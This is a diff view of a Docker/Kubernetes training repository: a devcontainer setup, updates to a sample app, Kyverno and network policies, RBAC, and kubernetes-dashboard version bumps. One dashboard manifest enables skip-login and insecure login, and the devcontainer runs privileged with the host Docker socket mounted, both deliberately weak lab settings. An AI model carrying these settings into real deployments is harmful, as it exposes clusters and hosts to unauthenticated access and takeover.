mirror of https://github.com/jpetazzo/container.training.git
synced 2026-02-16 02:29:57 +00:00

Compare commits: 2022-07-pr ... main (344 commits)
.devcontainer/devcontainer.json (new file, 26 lines)
@@ -0,0 +1,26 @@
{
    "name": "container.training environment to get started with Docker and/or Kubernetes",
    "image": "ghcr.io/jpetazzo/shpod",
    "features": {
        //"ghcr.io/devcontainers/features/common-utils:2": {}
    },

    // Use 'forwardPorts' to make a list of ports inside the container available locally.
    "forwardPorts": [],

    //"postCreateCommand": "... install extra packages...",
    "postStartCommand": "dind.sh ; kind.sh",

    // This lets us use "docker-outside-docker".
    // Unfortunately, minikube, kind, etc. don't work very well that way;
    // so for now, we'll likely use "docker-in-docker" instead (with a
    // privileged container). But we're still exposing that socket in case
    // someone wants to do something interesting with it.
    "mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],

    // This is for docker-in-docker.
    "privileged": true,

    // Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
    "remoteUser": "k8s"
}
.gitignore (vendored, 23 lines changed)
@@ -2,23 +2,23 @@
*.swp
*~

prepare-vms/tags
prepare-vms/infra
prepare-vms/www

prepare-tf/.terraform*
prepare-tf/terraform.*
prepare-tf/stage2/*.tf
prepare-tf/stage2/kubeconfig.*
prepare-tf/stage2/.terraform*
prepare-tf/stage2/terraform.*
prepare-tf/stage2/externalips.*
**/terraform.tfstate
**/terraform.tfstate.backup
prepare-labs/terraform/lab-environments
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
prepare-labs/www

slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
slides/_academy_*
slides/fragments
node_modules

### macOS ###
@@ -32,3 +32,4 @@ node_modules
Thumbs.db
ehthumbs.db
ehthumbs_vista.db
@@ -1,26 +1,24 @@
version: "2"

services:

  rng:
    build: rng
    ports:
    - "8001:80"

  hasher:
    build: hasher
    ports:
    - "8002:80"

  webui:
    build: webui
    ports:
    - "8000:80"
    volumes:
    - "./webui/files/:/files/"

  redis:
    image: redis

  worker:
    build: worker
@@ -1,7 +1,8 @@
 FROM ruby:alpine
+WORKDIR /app
 RUN apk add --update build-base curl
-RUN gem install sinatra
+RUN gem install sinatra --version '~> 3'
 RUN gem install thin
-ADD hasher.rb /
-CMD ["ruby", "hasher.rb"]
+COPY hasher.rb .
+CMD ["ruby", "hasher.rb", "-o", "::"]
 EXPOSE 80
@@ -2,7 +2,6 @@ require 'digest'
 require 'sinatra'
 require 'socket'
 
-set :bind, '0.0.0.0'
 set :port, 80
 
 post '/' do
@@ -1,5 +1,7 @@
 FROM python:alpine
+WORKDIR /app
 RUN pip install Flask
-COPY rng.py /
-CMD ["python", "rng.py"]
+COPY rng.py .
+ENV FLASK_APP=rng FLASK_RUN_HOST=:: FLASK_RUN_PORT=80
+CMD ["flask", "run", "--without-threads"]
 EXPOSE 80
@@ -28,5 +28,5 @@ def rng(how_many_bytes):
 
 
 if __name__ == "__main__":
-    app.run(host="0.0.0.0", port=80, threaded=False)
+    app.run(port=80)
@@ -1,7 +1,8 @@
-FROM node:4-slim
+FROM node:23-alpine
+WORKDIR /app
 RUN npm install express
-RUN npm install redis@3
-COPY files/ /files/
-COPY webui.js /
+RUN npm install morgan
+RUN npm install redis@5
+COPY . .
 CMD ["node", "webui.js"]
 EXPOSE 80
@@ -1,26 +1,34 @@
-var express = require('express');
-var app = express();
-var redis = require('redis');
+import express from 'express';
+import morgan from 'morgan';
+import { createClient } from 'redis';
 
-var client = redis.createClient(6379, 'redis');
-client.on("error", function (err) {
-  console.error("Redis error", err);
-});
+var client = await createClient({
+  url: "redis://redis",
+  socket: {
+    family: 0
+  }
+})
+  .on("error", function (err) {
+    console.error("Redis error", err);
+  })
+  .connect();
+
+var app = express();
+
+app.use(morgan('common'));
 
 app.get('/', function (req, res) {
   res.redirect('/index.html');
 });
 
-app.get('/json', function (req, res) {
-  client.hlen('wallet', function (err, coins) {
-    client.get('hashes', function (err, hashes) {
-      var now = Date.now() / 1000;
-      res.json( {
-        coins: coins,
-        hashes: hashes,
-        now: now
-      });
-    });
-  });
+app.get('/json', async(req, res) => {
+  var coins = await client.hLen('wallet');
+  var hashes = await client.get('hashes');
+  var now = Date.now() / 1000;
+  res.json({
+    coins: coins,
+    hashes: hashes,
+    now: now
+  });
 });
@@ -1,5 +1,6 @@
 FROM python:alpine
+WORKDIR /app
 RUN pip install redis
 RUN pip install requests
-COPY worker.py /
+COPY worker.py .
 CMD ["python", "worker.py"]
k8s/M6-ingress-nginx-cm-patch.yaml (new file, 9 lines)
@@ -0,0 +1,9 @@
apiVersion: v1
kind: ConfigMap
metadata:
  name: ingress-nginx-controller
  namespace: ingress-nginx
data:
  use-forwarded-headers: "true"
  compute-full-forwarded-for: "true"
  use-proxy-protocol: "true"
k8s/M6-ingress-nginx-components.yaml (new file, 10 lines)
@@ -0,0 +1,10 @@
apiVersion: v1
kind: Namespace
metadata:
  labels:
    app.kubernetes.io/instance: flux-system
    app.kubernetes.io/part-of: flux
    app.kubernetes.io/version: v2.5.1
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest
  name: ingress-nginx
k8s/M6-ingress-nginx-kustomization.yaml (new file, 12 lines)
@@ -0,0 +1,12 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- M6-ingress-nginx-components.yaml
- sync.yaml
patches:
- path: M6-ingress-nginx-cm-patch.yaml
  target:
    kind: ConfigMap
- path: M6-ingress-nginx-svc-patch.yaml
  target:
    kind: Service
k8s/M6-ingress-nginx-svc-patch.yaml (new file, 8 lines)
@@ -0,0 +1,8 @@
apiVersion: v1
kind: Service
metadata:
  name: ingress-nginx-controller
  namespace: ingress-nginx
  annotations:
    service.beta.kubernetes.io/scw-loadbalancer-proxy-protocol-v2: "true"
    service.beta.kubernetes.io/scw-loadbalancer-use-hostname: "true"
k8s/M6-kyverno-components.yaml (new file, 10 lines)
@@ -0,0 +1,10 @@
apiVersion: v1
kind: Namespace
metadata:
  labels:
    app.kubernetes.io/instance: flux-system
    app.kubernetes.io/part-of: flux
    app.kubernetes.io/version: v2.5.1
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest
  name: kyverno
k8s/M6-kyverno-enforce-service-account.yaml (new file, 72 lines)
@@ -0,0 +1,72 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: flux-multi-tenancy
spec:
  validationFailureAction: enforce
  rules:
  - name: serviceAccountName
    exclude:
      resources:
        namespaces:
        - flux-system
    match:
      resources:
        kinds:
        - Kustomization
        - HelmRelease
    validate:
      message: ".spec.serviceAccountName is required"
      pattern:
        spec:
          serviceAccountName: "?*"
  - name: kustomizationSourceRefNamespace
    exclude:
      resources:
        namespaces:
        - flux-system
        - ingress-nginx
        - kyverno
        - monitoring
        - openebs
    match:
      resources:
        kinds:
        - Kustomization
    preconditions:
      any:
      - key: "{{request.object.spec.sourceRef.namespace}}"
        operator: NotEquals
        value: ""
    validate:
      message: "spec.sourceRef.namespace must be the same as metadata.namespace"
      deny:
        conditions:
        - key: "{{request.object.spec.sourceRef.namespace}}"
          operator: NotEquals
          value: "{{request.object.metadata.namespace}}"
  - name: helmReleaseSourceRefNamespace
    exclude:
      resources:
        namespaces:
        - flux-system
        - ingress-nginx
        - kyverno
        - monitoring
        - openebs
    match:
      resources:
        kinds:
        - HelmRelease
    preconditions:
      any:
      - key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
        operator: NotEquals
        value: ""
    validate:
      message: "spec.chart.spec.sourceRef.namespace must be the same as metadata.namespace"
      deny:
        conditions:
        - key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
          operator: NotEquals
          value: "{{request.object.metadata.namespace}}"
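For context, a tenant object that this policy accepts has to carry spec.serviceAccountName and keep its sourceRef in its own namespace. A minimal, hypothetical Flux Kustomization sketch (the rocky/rocky-test names mirror the M6-rocky files below; the interval and the sourceRef name are illustrative):

apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: rocky
  namespace: rocky-test
spec:
  interval: 5m                 # illustrative value
  path: ./k8s/plain
  prune: true
  serviceAccountName: rocky    # required by the serviceAccountName rule
  sourceRef:
    kind: GitRepository
    name: rocky                # hypothetical source name
    # sourceRef.namespace is left unset: the empty value skips the
    # precondition, and setting it to "rocky-test" would also pass
    # the kustomizationSourceRefNamespace deny check.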
k8s/M6-monitoring-components.yaml (new file, 29 lines)
@@ -0,0 +1,29 @@
apiVersion: v1
kind: Namespace
metadata:
  labels:
    app.kubernetes.io/instance: flux-system
    app.kubernetes.io/part-of: flux
    app.kubernetes.io/version: v2.5.1
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest
  name: monitoring
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: grafana
  namespace: monitoring
spec:
  ingressClassName: nginx
  rules:
  - host: grafana.test.metal.mybestdomain.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: kube-prometheus-stack-grafana
            port:
              number: 80
k8s/M6-network-policies.yaml (new file, 35 lines)
@@ -0,0 +1,35 @@
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-from-other-namespaces
spec:
  podSelector: {}
  ingress:
  - from:
    - podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-webui
spec:
  podSelector:
    matchLabels:
      app: web
  ingress:
  - from: []
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-db
spec:
  podSelector:
    matchLabels:
      app: db
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: web
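These policies assume the workloads carry app=web and app=db labels. As a sketch, a pod that the allow-db policy would accept traffic from might look like this (the name and image are placeholders):

apiVersion: v1
kind: Pod
metadata:
  name: web-test      # placeholder name
  labels:
    app: web          # matches allow-webui, and allow-db's "from" selector
spec:
  containers:
  - name: web
    image: nginx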
k8s/M6-openebs-components.yaml (new file, 10 lines)
@@ -0,0 +1,10 @@
apiVersion: v1
kind: Namespace
metadata:
  labels:
    app.kubernetes.io/instance: flux-system
    app.kubernetes.io/part-of: flux
    app.kubernetes.io/version: v2.5.1
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest
  name: openebs
k8s/M6-openebs-kustomization.yaml (new file, 12 lines)
@@ -0,0 +1,12 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
namespace: openebs
resources:
- M6-openebs-components.yaml
- sync.yaml
configMapGenerator:
- name: openebs-values
  files:
  - values.yaml=M6-openebs-values.yaml
configurations:
- M6-openebs-kustomizeconfig.yaml
k8s/M6-openebs-kustomizeconfig.yaml (new file, 6 lines)
@@ -0,0 +1,6 @@
nameReference:
- kind: ConfigMap
  version: v1
  fieldSpecs:
  - path: spec/valuesFrom/name
    kind: HelmRelease
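This kustomizeconfig teaches kustomize that spec/valuesFrom/name in a HelmRelease refers to a ConfigMap name, so the hash suffix added by the configMapGenerator above gets propagated into the HelmRelease. The HelmRelease itself lives in sync.yaml (not shown in this diff); a hypothetical excerpt of what it might contain:

apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: openebs
  namespace: openebs
spec:
  chart:
    spec:
      chart: openebs
      sourceRef:
        kind: HelmRepository
        name: openebs        # hypothetical source name
  valuesFrom:
  - kind: ConfigMap
    name: openebs-values     # rewritten by kustomize to openebs-values-<hash>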
k8s/M6-openebs-values.yaml (new file, 15 lines)
@@ -0,0 +1,15 @@
# helm install openebs --namespace openebs openebs/openebs
#   --set engines.replicated.mayastor.enabled=false
#   --set lvm-localpv.lvmNode.kubeletDir=/var/lib/k0s/kubelet/
#   --create-namespace
engines:
  replicated:
    mayastor:
      enabled: false
# Needed for k0s install since kubelet install is slightly divergent from vanilla install >:-(
lvm-localpv:
  lvmNode:
    kubeletDir: /var/lib/k0s/kubelet/
localprovisioner:
  hostpathClass:
    isDefaultClass: true
k8s/M6-rocky-cluster-role.yaml (new file, 38 lines)
@@ -0,0 +1,38 @@
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  namespace: rocky-test
  name: rocky-full-access
rules:
- apiGroups: ["", extensions, apps]
  resources: [deployments, replicasets, pods, services, ingresses, statefulsets]
  verbs: [get, list, watch, create, update, patch, delete] # You can also use [*]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: rocky-pv-access
rules:
- apiGroups: [""]
  resources: [persistentvolumes]
  verbs: [get, list, watch, create, patch]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  labels:
    toolkit.fluxcd.io/tenant: rocky
  name: rocky-reconciler2
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: rocky-pv-access
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: gotk:rocky-test:reconciler
- kind: ServiceAccount
  name: rocky
  namespace: rocky-test
k8s/M6-rocky-ingress.yaml (new file, 19 lines)
@@ -0,0 +1,19 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: rocky
  namespace: rocky-test
spec:
  ingressClassName: nginx
  rules:
  - host: rocky.test.mybestdomain.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: web
            port:
              number: 80
k8s/M6-rocky-test-kustomization.yaml (new file, 8 lines)
@@ -0,0 +1,8 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../../base/rocky
patches:
- path: M6-rocky-test-patch.yaml
  target:
    kind: Kustomization
k8s/M6-rocky-test-patch.yaml (new file, 7 lines)
@@ -0,0 +1,7 @@
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: rocky
  namespace: rocky-test
spec:
  path: ./k8s/plain
k8s/blue.yaml (new file, 33 lines)
@@ -0,0 +1,33 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: blue
  name: blue
spec:
  replicas: 1
  selector:
    matchLabels:
      app: blue
  template:
    metadata:
      labels:
        app: blue
    spec:
      containers:
      - image: jpetazzo/color
        name: color
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: blue
  name: blue
spec:
  ports:
  - name: "80"
    port: 80
  selector:
    app: blue
@@ -17,8 +17,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 ---
@@ -30,8 +30,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-certs
   namespace: kubernetes-dashboard
 type: Opaque
@@ -43,8 +43,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-csrf
   namespace: kubernetes-dashboard
 type: Opaque
@@ -56,8 +56,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-key-holder
   namespace: kubernetes-dashboard
 type: Opaque
@@ -71,8 +71,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-settings
   namespace: kubernetes-dashboard
 ---
@@ -84,8 +84,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-metrics
 rules:
 - apiGroups:
@@ -106,8 +106,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-metrics
 roleRef:
   apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 rules:
@@ -182,8 +182,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 roleRef:
@@ -204,8 +204,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
     kubernetes.io/cluster-service: "true"
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 spec:
@@ -253,8 +253,8 @@ spec:
       app.kubernetes.io/instance: kubernetes-dashboard
       app.kubernetes.io/managed-by: Helm
       app.kubernetes.io/name: kubernetes-dashboard
-      app.kubernetes.io/version: 2.5.0
-      helm.sh/chart: kubernetes-dashboard-5.2.0
+      app.kubernetes.io/version: 2.7.0
+      helm.sh/chart: kubernetes-dashboard-6.0.0
     spec:
       containers:
       - args:
@@ -262,7 +262,7 @@ spec:
         - --sidecar-host=http://127.0.0.1:8000
         - --enable-skip-login
         - --enable-insecure-login
-        image: kubernetesui/dashboard:v2.5.0
+        image: kubernetesui/dashboard:v2.7.0
         imagePullPolicy: IfNotPresent
         livenessProbe:
           httpGet:
@@ -293,7 +293,7 @@ spec:
           name: kubernetes-dashboard-certs
         - mountPath: /tmp
           name: tmp-volume
-      - image: kubernetesui/metrics-scraper:v1.0.7
+      - image: kubernetesui/metrics-scraper:v1.0.8
         imagePullPolicy: IfNotPresent
         livenessProbe:
           httpGet:
@@ -17,8 +17,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 ---
@@ -30,8 +30,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-certs
   namespace: kubernetes-dashboard
 type: Opaque
@@ -43,8 +43,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-csrf
   namespace: kubernetes-dashboard
 type: Opaque
@@ -56,8 +56,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-key-holder
   namespace: kubernetes-dashboard
 type: Opaque
@@ -71,8 +71,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-settings
   namespace: kubernetes-dashboard
 ---
@@ -84,8 +84,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-metrics
 rules:
 - apiGroups:
@@ -106,8 +106,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-metrics
 roleRef:
   apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 rules:
@@ -182,8 +182,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 roleRef:
@@ -204,8 +204,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
     kubernetes.io/cluster-service: "true"
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 spec:
@@ -253,15 +253,15 @@ spec:
       app.kubernetes.io/instance: kubernetes-dashboard
       app.kubernetes.io/managed-by: Helm
       app.kubernetes.io/name: kubernetes-dashboard
-      app.kubernetes.io/version: 2.5.0
-      helm.sh/chart: kubernetes-dashboard-5.2.0
+      app.kubernetes.io/version: 2.7.0
+      helm.sh/chart: kubernetes-dashboard-6.0.0
     spec:
       containers:
       - args:
         - --namespace=kubernetes-dashboard
         - --auto-generate-certificates
         - --sidecar-host=http://127.0.0.1:8000
-        image: kubernetesui/dashboard:v2.5.0
+        image: kubernetesui/dashboard:v2.7.0
         imagePullPolicy: IfNotPresent
         livenessProbe:
           httpGet:
@@ -292,7 +292,7 @@ spec:
           name: kubernetes-dashboard-certs
         - mountPath: /tmp
           name: tmp-volume
-      - image: kubernetesui/metrics-scraper:v1.0.7
+      - image: kubernetesui/metrics-scraper:v1.0.8
         imagePullPolicy: IfNotPresent
         livenessProbe:
           httpGet:
@@ -17,8 +17,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 ---
@@ -30,8 +30,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-certs
   namespace: kubernetes-dashboard
 type: Opaque
@@ -43,8 +43,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-csrf
   namespace: kubernetes-dashboard
 type: Opaque
@@ -56,8 +56,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-key-holder
   namespace: kubernetes-dashboard
 type: Opaque
@@ -71,8 +71,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-settings
   namespace: kubernetes-dashboard
 ---
@@ -84,8 +84,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-metrics
 rules:
 - apiGroups:
@@ -106,8 +106,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard-metrics
 roleRef:
   apiGroup: rbac.authorization.k8s.io
@@ -126,8 +126,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
